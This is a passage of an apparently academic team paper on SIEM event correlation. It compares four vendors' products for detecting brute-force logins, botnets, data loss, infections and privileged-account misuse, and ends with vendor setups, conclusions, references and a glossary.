CorrelatingThe above events looked at individually may not raise a high priority alarm. Each eventcould be treated individually with specific mitigation techniques or even possibly ignored.Looking at each event individually makes it difficult to assess if a strategic attack isoccurring and what an attackers goal may be. These combined events together should betreated differently then each event by themselves. Correlating the events gives a companya better picture of the an overall attack strategy used by an attacker. This knowledge canallow a company to quickly adopt an overall defense strategy very quickly. Hopefully themany products offered by SIEM vendors can effectively leverage event correlation and helpa company better protect itself.

Before We Begin

This paper assumes you the user have already done your due diligence regarding theselection of a SIEM. The SIEM technology meets your business needs, and you alreadyhave use cases you need to address with the technology. There is one item to verify beforewe go any further with the discussion of using and correlation of data. A company needs tohave a corporate policy defining appropriate and inappropriate computer use. A behavior inone environment may violate company policy or federal regulations, but in another, thepolicy may be less stringent and allow questionable actions. The typical college campuscomes to mind. A sound corporate policy will drive many practical uses of a SIEM. Thissection assumes you already have a company security policy that your SIEM will support.SIEM correlation rules apply logic to data and make decision based on the logic. Without



applying context, content, and other external factors does not always derive the correctanswer. This is why the analyst plays an important role.

What is a SIEM?

A SIEM is a huge bucket of data available for searching and reporting of normalized data. ASIEM is a huge repository of data stored in a normalized format. Normalization of data isthe process of converting log data from its native form into a common format. Thiscommon format empowers users the ability to search for common events across disparatesystems. Being able to make sense and business use of the data is the magic of a SIEManalyst. This section of the paper will discuss how to leverage log data to address thefollowing use cases:

• Identify common attacks and what logs entries they produce• Prevention of in-bound attacks (both external/internal)• Prevention of out-outbound data loss (DLP)• Identifying Infected systems• Mitigating against infected systems• Use and misuse of privileged accounts• Access to sensitive information (database information such as payroll)

Access to Enterprise-wide Data and Events

One of the strengths of the SIEM is the ability to quickly view, navigate, find and report onevents in an environment. Collection of data into a common system with the ability to viewand prioritize events can solve many security challenges facing organizations today. Belowis an example of a view from a SIEM. There is a wealth of information waiting for theanalyst to use.



Overview screen from QRadar

Vendor Setups

When preparing for this section the team collaborated with four vendors to address the usecases and provide the team with additional council on how to best leverage a SIEM in thefictional environment. The team prepared a survey to gather information from the vendorsconcerning their products. As part of the survey, the vendors made recommendations ofhow much product would address the company’s business need and how their productwould fit into a fictional company network. The team allowed the vendors to configuretheir products in the fictional company to produce optimal results while using a reasonablebudget. The vendors collaborating with the teams are:

• Log Rhythm (http://logrhythm.com/)• QRadar (http://www.q1labs.com/)• Prismmicrosystems (http://www.prismmicrosys.com/)• Nitro Security (http://nitrosecurity.com/)



http://logrhythm.com/

http://nitrosecurity.com/

Proceed with Caution

A strength and curse of a SIEM is the deep insight into an environment that before SIEMimplementation was not possible. The SIEM allows the collection and viewing of data thatmost environments rarely had access to before the arrival of a SIEM. Unless yourenvironment is unique, the first thing you will notice about your environment is the amountof operational crud that needs attention and correction. Most companies uncover a plethoraof broken process and policy violations. This operational noise provides the perfect coverfor nefarious activities to fly under the radar. Although the cleanup of these policyviolations and broken processes can be arduous, it is well worth it. Operational issues canquickly become outages and resource drains.

The next warning concerns sales staff who may tell you a SIEM runs itself. Although ourteam did not hear this from any of the vendors participating in our study, there are manyhorror stories from people who were told, “Turn it on, point log sources at it and it will runitself.” A SIEM or any tool is only as good as the person using it. The analyst appliesbusiness knowledge and context to events in the environment.

Finally a SIEM can quickly overwhelm an analyst once the data starts flowing. Thetemptation to send everything to a SIEM is common, however, after a short period mostusers realize they need to prioritize the data. One of the collateral effects of sending largeamounts of log data to a SIEM, is having to weed through volumes of meaninglessinformation. With tuning, business knowledge, corporate policies, and product knowledge,the analyst starts to recognize the useful data from noise.

Identify common attacks and what logs entries theyproduce

Brute force login attempts are an old school way of breaking into a computer system. Thereare numerous studies concerning the dangers of weak passwords chosen by users. Manyusers prefer convenience over security, a practice that places organizations at risk. Thereport below shows the server at IP address 10.10.10.10 having 343,906 failed logins fromthe user baduser. This report is for the period spanning April 30 to May 5. Furtherinvestigation would reveal either a broken process trying to connect to the server, or amalicious user trying to connect to the server by brute force password guessing. Regardlessof the root cause, this event requires further investigation and resolution. This report mayalso reveal a policy violation of an account that does not have a lockout threshold after somany failed attempts.



Nitro Security login failed report

· Identify common attacks and what logs entries they produce

The view below shows a correlated incidents dashboard summarizing potentialattacks (by the correlated events they generate), bound to the source anddestination IPs associated with the events, and then allowing the user to see theindividual log events in the Events window at the bottom. Nitroview employs atechnique called “data binding” which allows live linking of queries betweencomponent windows to allow on-demand forensic investigation.



Nitro Security Common Attacks

Identify common attacks

• password guess/login failure, alerting via e-mail



• Inbound attack (captured via snort integration)

• Firewall blocks (summary showing time, destination and source)

• Software install (Office 2007 by user=jcarlson)



• Abnormal IP address access to network by 206.33.41.126

Prism Microsystems common attacks

Prevention of in-bound attacks (both external/internal)

· Prevention of in-bound attacks (both external/internal)

The view below offers a summary of events headed “into” the JWP private IP space(10.0.0.0/8). Through the use of baselining, the customer can compare currentevent activity by destination IP to the historical normative behavior. This allows acontextual understanding of how events are changing in time, helping pinpointanomalous activity into the JWP network.



Nitro Security in-bound attack detection using baselining

It is hard to read anything security-related in the mainstream news without hearing aboutthe deluge of botnets on the Internet. These pesky adversaries can suck the life and dataout of any network. Early detection of botnets can help improve the security posture of anycompany. Below is an example of botnet detection using QRadar.



QRadar detecting a botnet with the help of QFlow

Log Rhythm detecting anomalous network behavior



Prevention of out-outbound data loss (DLP)

Richard Bejtlich in his book Extrusion Detection Security Monitoring for Internal Systemsdefines extrusion detection as “the process of indentifying unauthorized activity byinspecting outbound network traffic.”

The value of any company is Intellectual Property. Intellectual Property can take manyforms depending on the business or environment. Regardless of the environment, loss ofintellectual property can be damaging to a company. In this age of global business andcompetition, protecting Intellectual Property is not only mission critical, it is also verydifficult. Determined miscreants have become increasingly brazen and determined in theirefforts to gain competitive advantages. Sending the right data to a SIEM, coupled withreporting can help protect an environment against outbound data loss.

For example, every company knows or should know who their competition is. Using e-maillogs a company can see if any employee is communicating with competitors. If they are thecompany can start an investigation to see if any intellectual property such as sales contacts,bids, or financial data among other is being sent to the competition. Using Netflow (sessiondata) in combination with e-mail logs could help an environment find secrets being leakedto a competitor.

Another example is the use of Netflow data to watch printer activity. If you notice anemployee increases their printing activity, printing larger volumes than normal. This maybe a sign that an employee is printing sensitive or confidential material for use outside of anorganization.

Prevention of out-outbound data loss (DLP)The view below is depicts the Nitroview capability of taking feeds from theApplication Data Monitoring Appliance. Again, we are using the filtering option, thistime for destination traffic that does not terminate in the JWP internal network.Shown is an example of gnutella traffic sourced from the JWP network heading to theInternet.



Nitro Security detecting outbound Gnutella traffic



QRadar reporting on DLP

• USB insertion detected; user=cmills, system = SAPPHIRE• Risk is evaluated as Low because Asset value is low and vulnerability status is low



Prism Microsystems detecting DLP via USB drives

Identifying Infected systems

· Identifying Infected systems

This view allows the comparison of network flow data collected from the networkinfrastructure to event data to help pinpoint potentially infected machines in the JWPnetwork.

Nitro Security detecting infected systems

Normal worm behavior



Worm behavior found in the QRadar system.

Identifying infected systems• System SAPPHIRE has been infected by 0.exe and hacker.exe



• Infection traced to USB inserted by User=PRISMUSA\warren

Prism Microsystem detecting computer infections



Log Rhythm detecting suspicious behavior and possible infection

Mitigating against infected systems

Mitigation options for Nitroview customers include the ability to add attackers to IPSbased blacklists, and integration with other security appliances. Any event, includingthose that indicate possible infections, can be used as triggers to generated snmptrap or syslog notification to these other systems (NAC, AV f/w,etc.).



Nitro Security's integration with IPS systems

Use and misuse of privileged accounts

· Use and misuse of privileged accounts

The privileged user audit trail shows event activity by users defined as members ofprivileged groups (Administrator, root, sa, etc.)



Nitro security privileged account use

The use and misuse of privileged accounts is a big concern for many organizations. Thereseems to be a constant battle between administration staff who are task with administrationof a host, and the user community who complain the only they can do their job is with aprivileged account. With the privilege comes responsibility and temptation. We see in thisreport below the user BadUser cleared the Windows Event Log on the server at IP address10.10.10.10. Keeping a local copy of the Event Log is important for the WindowsAdministration staff; this gives them the ability to troubleshoot problems. If the Windowslog were not centrally stored, an action like this could cripple a security or operationalinvestigation. Knowing when and who cleared events logs is very important to securityposture of any organization.



User clearing a Windows Event Log



Log Rhythm privileged use report



QRadar use and misuse of privileged accounts

• PMILAB\warren is an administrator

Prism Microsystems privileges use reporting



Access to sensitive information (database informationsuch as payroll)

· Access to sensitive information (database information such as payroll)

This application view illustrates activity by users who are accessing the paymentsapplication.

Nitro Security sensitive data access

Data breaches can be devastating to a company, especially a company that is small tomedium in size. Being able to audit who is accessing PII (personally identifiableinformation) can be a business saving control. Data breaches can cost anywhere from $90to $300 US dollars per record. Statistics like this demonstrate how costly a database breachwill likely be. The report below monitors users that access PII data in the payrollapplication. The blue line is a baseline for the five previous periods. This report ran for theweek of 04/19/2010 to 04/26/2010, so the baseline is for the five previous weeks. We cansee two periods where the current activity was out-of-baseline. It is activity on 04/19/2010and 04/22/2010. The top report displays the times and numbers of PII access. The bottompane displays the users who accessed data in this period. We see jim and bob. If bob isaccessing data outside of his job responsibility, the company can investigate why he wasaccessing the data, and determine what data he accessed.



Nitro Security report showing the accessing of PII data by users jim and bob.



SIEM Correlation Rules

QRadar correlation editor



Behavior anomaly detection for processes

Prism Microsystems behavior anomoly

Change auditing showing types of changes (authorized, unauthorized etc)



Prism Microsystems change audit

Change audit summary



Prism Microsystems change audit

Risk prioritized alerts console



Prism Microsystems risk alerts console

Netflow v9 – Top 10 conversations



Prism Microsystems top ten conversations

Netflow v9 – Top 10 applications



Prism Microsystems top ten applications

Netflow v9 – Top 10 protocols



Prism Microsystems top ten protocols

Event log arrival rates in real-time



Prism Microsystems events per second report

Trend of user logons over 6 hours



Prism Microsystems logon trend report

Emerging Trends

One of the newest trends vendors are starting to market is the ability to integrate Geolocation into the data using services like http://www.maxmind.com. This is a powerful toolsthat can help organizations pinpoint the source or destination of connections. Imagine anorganization that does not do business outside a geographical location. Geo location datacan quickly pinpoint unauthorized access or connections based on an IP.



Geo-location table from Log Rhythm

Vendor Setups

QRadar SetupIndividual QRadar event collectors can scale up to and beyond 5,000 EPS. In a single datacenter environment, an all-in-one deployment (console, event collector/processor, and flowcollector/processor) could handle this event rate. Depending on the inter-site bandwidth, itis possible to backhaul raw events from remote sites to a central collector. However, it isgenerally preferred to have collectors close to the point of collection. In this scenario, thatwould mean:

1. A central console at the primary site. This serves as the interface for viewingoffenses, performing searches, and generating reports.

2. An event collector at the primary site. Assuming EPS is evenly distributed acrossboth data centers, a 2,500 EPS license is sufficient.

3. An event collector at the secondary site. Again, assuming EPS is evenly distributedacross both data centers, a 2,500 EPS license is sufficient.

It may be possible to use the existing log receivers to locally collect events and forwardthem to the central site. This requires further investigation into the capabilities of the logreceivers.



As with all business decisions, we would have to evaluate bandwidth requirements tobackhaul raw events and the cost of a distributed vs central SIEM deployment. It may evenmake financial sense to increase bandwidth between sites.

Another consideration is collection of network activity. QRadar has the capability to collectNetFlow, JFlow, and sFlow data from existing infrastructure equipment such as Cisco routersand switches. In addition, Q1 Labs provide our own collectors, QFlow collectors, which aretied into the infrastructure through mirror/SPAN port or network taps at strategic locations.NetFlow and JFlow provide connection information to layer 4; sFlow and QFlow provideapplication layer visibility for true application detection and content capture. The benefit ofnetwork visibility is:

1. Passive profiling of network assets. One of the challenges with SIEM is to providecontext to rules, including where are my assets and what are their functions.Network monitoring can identify assets and profile them automatically, for initialsetup and ongoing monitoring. For example, QRadar will automatically detect DNSservers and display them in a list for administrative approval. Any connections toDNS servers not in the approved list may trigger a rule that, for example, detectsbotnets trying to find their command and control server through fast-flux DNSservers.

2. Forensics. Network activity provides greater forensic data, allowing analysts to seeinformation that may not be available from logs, to gain a wider view, so to speak.Content capture with QFlow or sFlow provides forensic depth. Let’s face it, one ofthe first things an intruder will do once s/he compromises a machine is to turn offlogging and erase his/her tracks. At this point, SIEM is blind without networkactivity logging.

3. Trend analysis and anomaly detection. QRadar will build a profile of normal networkactivity, including seasonal patterns. This can be used to detect statisticalanomalies, deviations from expected patterns (20% increase in IM traffic, forexample), and threshold violations. These can all be correlated with event activity inrules.

Prism Microsystems SetupEventTracker was designed specifically for the Medium Enterprise such as JWP. As asoftware-only solution that runs on a user-provided Windows platform, it is ideally suited tothis network.EventTracker can either collect agentless (via polling the Windows event log) or through anagent we provide. We recommend utilizing the agent as it provides a number of compellingbenefits.

The EventTracker agent is extremely lightweight, highly flexible and centrally managed anddeployed.



One of the significant disadvantages with a polling method is that the duration betweeneach poll enables hackers to modify the system and cover their tracks through turning offauditing or wiping out the event log. With an agent, the events are pushed in real timeputting the logs beyond the reach of a person seeking to cover their tracks. Also in the caseof system problems that could potentially corrupt the system, the logs of the events leadingup to the crash could be lost if the system event log is corrupted. With an agent thesevaluable records have already been retained.

EventTracker agents allow fine grained control of event forwarding. The agent can send allevents in real-time, a subset of critical events in realtime and the others in encryptedcompressed files on a periodic basis, or if the system is not critical, all the logs on a batchbasis – via a guaranteed, compressed and secure transmission.

The EventTracker agent also provides capabilities beyond simply collecting the WindowsEvent Log. It enables the user to perform:

• Change auditing• USB device monitoring (including writes to devices)• Application monitoring• Custom log file monitoring• Network connection monitoring• Network install/uninstall monitoring• Process monitoring

Nitro Security SetupRecommendations

• 1 NitroView ESM, 1 Receiver, and 1 DBM at the Primary site• 1 Receiver OR Nitro Agents in the DMZ• 1 Receiver at the Secondary Site

Also recommend,2 IPS to be deployed one at each site after the firewall. This is to meet the objective of:

• Identify common attacks and what logs entries they produce• Prevention of in-bound attacks (both external/internal)• Prevention of out-outbound data loss (DLP)• Mitigating against infected systems

Log RhythmRecommendations

• 1 EM appliance at the primary site• 1 LM appliance at the main site• 1 LM appliance at the remote site



Use Log Rhythm agents on UNIX and Windows hosts. Standard syslog agent on all otherhosts

6. Conclusions

When the team received this assignment, our initial thoughts were some vendors would notbe able to meet the project criteria. During interviews with the vendors, it became obviousour use cases are solved by the vendors on routine basis. The vendors were able toaddress all use cases presented to them. To security staff on the front lines, these usecases (your boss may refer to them as "opportunities) can be daunting. Each vendor had aniche to separate his or her product from the competition. The use cases presented to thevendors was no big deal for the vendors. Here is a summary of some special features eachvendor felt separated him or her from the competition.

Log Rhythm• Powerful agent that allowed audits and monitoring of remote systems. Allows helps

cut cost by replacing redundant tools• Powerful regular expression rules engine• Easy to use interface

Nitro Security• Geo location feature, narrow traffic to a city/zip code• EDB database is very fast• Content aware SIEM

QRadar• ARIEL back-end database optimized for write-once, read many• Correlation editor is simple to use, similar in look to Microsoft Outlook's rules wizard• Auto discovery capability - discover and apply context rules to new devices

Prism Microsystems• Software only solution, allows customer to size the hardware according to needs• Data stored in CAB files, no back-end database or DBA needed• Powerful Window's agent with improved data monitoring and auditing on the remote

systemIf you read Anton Chuvakin's blog you will find that searches for an open source SIEM ishigher than open source log management. Anton writes about this phenomena periodically.Meeting with security professionals it is easy to find smart people who undertaken theyeoman's task of developing an in-house log management/SIEM for their environment.Most will tell you they were able to cobble together some tools and satisfy needs on a smallscale with limited success. Scaling out to multiple log sources, and higher volume uses



shows the futility of trying to develop your own solution. One of our team membersundertook this task and was the poster child for the above situation.

A SIEM can provide a powerful resource to any organization if used correctly and withpurpose. Implementing a SIEM involves more than pointing log sources at it andscheduling reports. The reports or alerts are a starting point not an endpoint. The alert is aproduct applying intelligence to a series of events making a conclusion based on that event.The analyst is the person who applies the business, environmental and context knowledgeagainst the alert to determine the nest steps. A SIEM requires processes and procedures tokeep a SIEM running. There is the constant battle of log sources not sending, retirement ofservers, implementation of new servers, new reporting requirements, investigations of dailyoperations and alerts, etc. There is a large amount of work, but done correctly it isrewarding and extremely valuable to any environment.

Finally if you are investigating the use of a SIEM and the vendor claims there is little to nostaff required -- run! Any tool is only as good as the analyst running it. The analyst needsto provide the care and feeding to keep the environment running. The analyst has thebusiness and environmental knowledge while reviewing the context and content of an alert.The analyst should be improving rules to meet business needs, ignore data with no value,and verify log sources are kept current. In the right environment a SIEM can offerexceptional value to an organization.

Vendor Summary

(A - Automatically, M - Manually, N - Not Available)Log

RythmQRadar Prismmicro Nitro

Identify common attacks and what logs entries theyproduce

A A A A

Detection of in-bound attacks (both external/internal)

A A A A

Detection of out-outbound data loss (DLP) A A A A

Identifying Infected systems A A A A

Mitigating against infected systems A A A A

Use and misuse of privileged accounts A A A A

Access to sensitive information (databaseinformation such as payroll

A A A A

Geo location A A A A

Learning Curve (*-***/slower - faster) * NA * ***



Setup Time (* - ***/slower - faster) * *** * **

Unique FeaturesPowerful

agent

collectors

Auto

discover

and

context

rule

applying

Data stored

in flat files

Fastest

DB - EDB

Business Openness (* - ***/ Difficult - Open) ** *** *** ***

7. References

Syslog in Wikipedia. http://en.wikipedia.org/wiki/Syslog as on April 15, 2010.

Ponemon Institue - 2009 Annual Cost of Data Breach, www.pgp.com/insight/newsroom/press_release/2009_annual_study_cost_of_data_breach, as on May 5th, 2010

The System Logging Dæmons, syslogd and klog. (2000). http://www.linuxjournal.com/article/4036, as on April 15, 2010

Linux Administration Handbook, Second Edition (Nemeth, Snyder, Hein), October 2006

Essential SNMP, Second Edition (Mauro, Schmidt), September 2005

Syslog-ng in Wikipedia. http://en.wikipedia.org/wiki/Syslog-ng, as on April 15, 2010

RSyslog - History. http://www.rsyslog.com/doc-history.html, as on April 16, 2010

Bejtlich, Richard, The Tao of Network Security Monitoring. Addison Wesley, 2005

Bejtlich, Richard, Extrusion Detection: Security Monitoring for Internal Intrusions. AddisonWesley, 2006

IOS configuring snmptrap. (2008) http://www.cisco.com/en/US/tech/tk648/tk362/technologies_tech_note09186a0080094a05.shtml

Configuring Netflow. (2001). http://www.cisco.com/en/US/docs/ios/12_1/switch/configuration/guide/xcdnfc.html#wp1000872

Akin, Thomas (2002). Hardening Cisco Routers.



http://oreilly.com/catalog/hardcisco/chapter/ch10.html

PIX/ASA 7.x and later with Syslog Configuration Example. (2007)http://www.cisco.com/en/US/products/hw/vpndevc/ps2030/products_configuration_example09186a00805a2e04.shtml#as

Intersect Alliance, Snare Epilog for Windows. (2010).http://www.intersectalliance.com/projects/EpilogWindows/index.html

Bowen, Rich. (2006). Sending Apache httpd Logs to Syslog.http://tim.oreilly.com/pub/a/sysadmin/2006/10/12/httpd-syslog.html

Guide to SNARE for MSSQL. (2010)http://www.intersectalliance.com/resources/Documentation/Guide_to_SNARE_for_MSSQL-1.0.pdf

Lupal. (2008). The Honeynet Project, The Lupper Worm.http://www.honeynet.org/node/39

Emerging threats snort rules. (2010).http://www.emergingthreats.net/rules/

Extrusion Detection Security Monitoring for Internal Systems pp. 83-84

Gaudin, Sharon. (2007). Security Breaches Cost $90 To $305 Per Lost Record.http://www.informationweek.com/news/security/showArticle.jhtml?articleID=199000222

Configuring Netflow http://www.cisco.com/en/US/docs/ios/12_1/switch/configuration/guide/xcdnfc.html#wp1000872

8. Appendix

Helpful WEB sites:

Anton Chuvakin Blog - "Security Warrior"http://chuvakin.blogspot.com/

TaoSecurityhttp://taosecurity.blogspot.com/

SANS Blogshttps://blogs.sans.org



Mandiant Bloghttp://blog.mandiant.com/

Internet Storm Centerhttp://isc.sans.org/

WEB Sites for vendors participating in the project

QRadarhttp://www.q1labs.com/Prismmicrosystemshttp://www.prismmicrosys.com/Nitro Securityhttp://nitrosecurity.com/Log Rhythmhttp://logrhythm.com/

A: Glossary

ASA Adaptive Security Appliance – Successor to Cisco’s PIX firewall.

BIND Berkeley Internet Name Daemon – A popular implementation of DNS.

BSD Berkeley Software Distribution (BSD, sometimes called Berkeley Unix) is theUNIX operating system derivative developed and distributed by theComputer Systems Research Group (CSRG) of the University of California,Berkeley, from 1977 to 1995.

CDMA Code Division Multiple Access – A channel access method used by variousradio communication technologies.

CPU Central Processing Unit - the portion of a computer system that carries outthe instructions of a computer program, and is the primary element carryingout the computer's functions.

DLP Data Loss Prevention - a system designed to detect and preventunauthorized use or transmission of data.

DNS Domain Name System - a hierarchical naming system for computers,services, or any resource connected to the Internet.



DoS/DDoS Denial of Service/Distributed Denial of Service – an attack designed to rendera target system unusable for its intended purpose.

DST Daylight Savings Time - the practice of temporarily advancing clocks so thatafternoons have more daylight and mornings have less.

FWSM FireWall Services Module - integrated firewall module for Cisco Catalyst 6500switches and Cisco 7600 Series routers, based on Cisco’s PIX firewall.

GPS Global Positioning System

HVAC stands for the closely related functions of Heating, Ventilating, and AirConditioning.

I/O Input Output

IDS Intrusion Detection System - software and/or hardware designed to detectunwanted attempts at accessing, manipulating, and/or disabling of computersystems through a network.

IKE IPSec Key Exchange – a general purpose key exchange protocol.

IOS Internetworking Operating System used by Cisco network devices.

IP Internet Protocol - a protocol used for communicating data across a packet-switched internetwork, also referred to as TCP/IP

IPS Intrusion Prevention System –a system that monitors network and/orcomputer activities for malicious or unwanted behavior and can block orprevent those activities.

IPsec Internet Protocol security - a protocol suite for securing Internet Protocol (IP)communications.

netflow A network protocol used for collecting IP traffic information on networkdevices

NTP Network Time Protocol – provides a means of synchronizing clocks over acomputer network.

PIX Private Internet eXchange – a popular Cisco firewall appliance.



RFC Request For Comment - a document published by the IETF (InternetEngineering Task Force) that describes the innovations, behaviors, research,or methods that apply to the working of the Internet and Internet-connectedsystems.

RMON Remote Network MONitoring

SIEM Security Information and Event Monitoring

SNMP Simple Network Management Protocol - used to monitor and managenetwork-attached devices.

TCP Transport Control Protocol - one of the core protocols of the Internet protocolsuite that uses implicit hand-shaking dialogues for guaranteeing reliability,ordering, and data integrity.

TLS Transport Layer Security (TLS) and its predecessor, Secure Socket Layer(SSL), are cryptographic protocols that provide security for communicationsover networks such as the Internet.

UDP User Datagram Protocol - uses a simple transmission model without implicithand-shaking dialogues for guaranteeing reliability, ordering, or dataintegrity.

UPS An Uninterruptible power supply (UPS), also known as a battery backup,provides emergency power and, depending on the topology, line regulationas well to connected equipment by supplying power from a separate sourcewhen utility power is not available.

UTC Coordinated Universal Time - is a time standard based on InternationalAtomic Time (TAI) with leap seconds added at irregular intervals tocompensate for the Earth's slowing rotation.

VoIP Voice over Internet Protocol (VoIP) is a general term for a family oftransmission technologies for delivery of voice communications over IPnetworks.

VPN Virtual Private Network - a network that is layered on top of an underlyingcomputer network to provide confidentiality.

WAP Wireless Access Point



event correlation and siem vendor approaches · what's in the data bucket? event correlation...

Documents